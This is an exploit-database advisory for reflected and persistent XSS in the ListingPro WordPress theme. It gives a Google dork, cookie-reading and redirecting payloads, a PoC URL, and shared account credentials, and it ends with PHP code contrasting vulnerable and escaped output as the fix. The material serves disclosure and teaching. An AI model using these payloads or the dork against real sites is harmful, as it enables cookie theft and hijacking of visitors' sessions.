ListingPro - WordPress Directory Theme v2.0.14.2 Reflected & Persistent XSS - CXSecurity.com

Vulnerability ID: 1840282 | Vulnerability type: (not specified)
Published: 2019-11-29 | Updated: 2019-11-29
CVE ID: N/A | CNNVD-ID: N/A
Platform: N/A | CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2019110175
|Details
Vulnerability details have not yet been disclosed.
|Exploit
# Exploit Title: ListingPro - WordPress Directory Theme v2.0.14.2 Reflected & Persistent XSS
# Google Dork: /wp-content/themes/listingpro/
# Date: 29/11/2019
# Exploit Author: SUBVΞRSΛ
# Vendor Homepage: https://listingprowp.com/beta/
# Software Link: https://themeforest.net/item/listingpro-multipurpose-directory-theme/19386460
# Version: 2.0.14.2 [ 12.563 Sales ]
# Tested on: Parrot OS
# CVE : -
# CWE : 79


----[]- Reflected XSS: -[]----
Enter the payload in the «What» input field on the homepage ( https://classic.listingprowp.com/ ) and submit the form; the payload is reflected in the response and triggers.

Payload Sample #0: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
Payload Sample #1: "><img src=x onerror=alert(`SUBVΞRSΛ`)>

PoC Link: https://classic.listingprowp.com/?select=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60SUBV%CE%9ERS%CE%9B%60%29%3E&lp_s_loc=&lp_s_tag=&lp_s_cat=&s=home&post_type=listing


----[]- Persistent XSS: -[]----
You need a basic user account (register your own or use mine: kadajik5554913/hYWeOJdr5Mqe), then go to the https://classic.listingprowp.com/submit-listing/ page to submit a new listing. Choose the «Free» plan and press the «Continue» button. On the next page, choose any category; you will then see the vulnerable input fields «Best Day/Night» and «Good For» (for some categories only one vulnerable field, «Good For», is shown). Enter your payload in the vulnerable field(s) and save the listing.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><img src=x onerror=window.location.replace(`http://defcon.su`)>

PoC: log in as kadajik5554913/hYWeOJdr5Mqe (login/password) and go to the https://classic.listingprowp.com/?post_type=listing&p=18417 page.
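The advisory gives no source and no fix, so the following is an added example, not ListingPro's code, showing the defect class behind both findings (the reflected «What» field and the persistent «Good For» field) next to the WordPress-idiomatic correction: sanitize on save, and escape for the exact output context at render time. The query parameter name `select` and the meta key `good_for` are assumptions taken from the PoC URL and the field label; they are not the theme's real identifiers. The shims at the top stand in for the WordPress core functions so the file runs outside WordPress.

```php
<?php
// Added example (not ListingPro's code). "select" and "good_for" are assumed
// names based on the advisory's PoC URL and field label, not the theme's real ones.

// Stand-in shims so this file runs outside WordPress. Inside a theme the core
// functions esc_attr(), esc_html() and sanitize_text_field() already exist.
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field(string $s): string {
        // Approximation of the WordPress behaviour: strip tags, drop control chars, trim.
        $s = strip_tags($s);
        $s = preg_replace('/[\x00-\x1F\x7F]/', '', $s);
        return trim($s);
    }
}

// --- Reflected case: the search form on the homepage ---

// Vulnerable pattern: the query parameter is interpolated into the value attribute
// verbatim, so a value containing "> closes the attribute and the rest becomes markup.
function render_what_field_vulnerable(array $get): string {
    $what = $get['select'] ?? '';
    return '<input type="text" name="select" value="' . $what . '">';
}

// Hardened: escape for the attribute context at the point of output.
function render_what_field_safe(array $get): string {
    $what = $get['select'] ?? '';
    return '<input type="text" name="select" value="' . esc_attr($what) . '">';
}

// --- Persistent case: the "Good For" field on the listing submission form ---

// In-memory stand-in for post meta (update_post_meta / get_post_meta in WordPress).
$listing_meta = [];

// Sanitize when the listing is saved...
function save_good_for(array &$store, int $listing_id, string $raw): void {
    $store[$listing_id]['good_for'] = sanitize_text_field($raw);
}

// ...and escape again when it is rendered on the listing page. Sanitizing on save is
// defence in depth; escaping on output is the control that actually prevents XSS,
// since data can also reach the database through imports, REST calls or admin edits.
function render_good_for(array $store, int $listing_id): string {
    $value = $store[$listing_id]['good_for'] ?? '';
    return '<span class="good-for">' . esc_html($value) . '</span>';
}

// Constructed sample input, shaped like the advisory's first payload.
$sample = ['select' => '"><img src=x onerror=alert(1)>'];

// Vulnerable output: the attribute is closed early and an <img> tag lands in the page.
echo render_what_field_vulnerable($sample), PHP_EOL;
// Hardened output: quotes and angle brackets arrive as entities, so the browser
// treats the whole value as attribute text.
echo render_what_field_safe($sample), PHP_EOL;

// Persistent path: tags are stripped on save, and what remains is entity-encoded on render.
save_good_for($listing_meta, 1, $sample['select']);
echo render_good_for($listing_meta, 1), PHP_EOL;
```

Run with `php example.php`. The point to take from it: the fix is not a blocklist on `<img` or `onerror`, it is escaping every untrusted value for the context it is written into (attribute, HTML body, URL, JavaScript) at the moment of output, with input sanitization as a second layer rather than the only one.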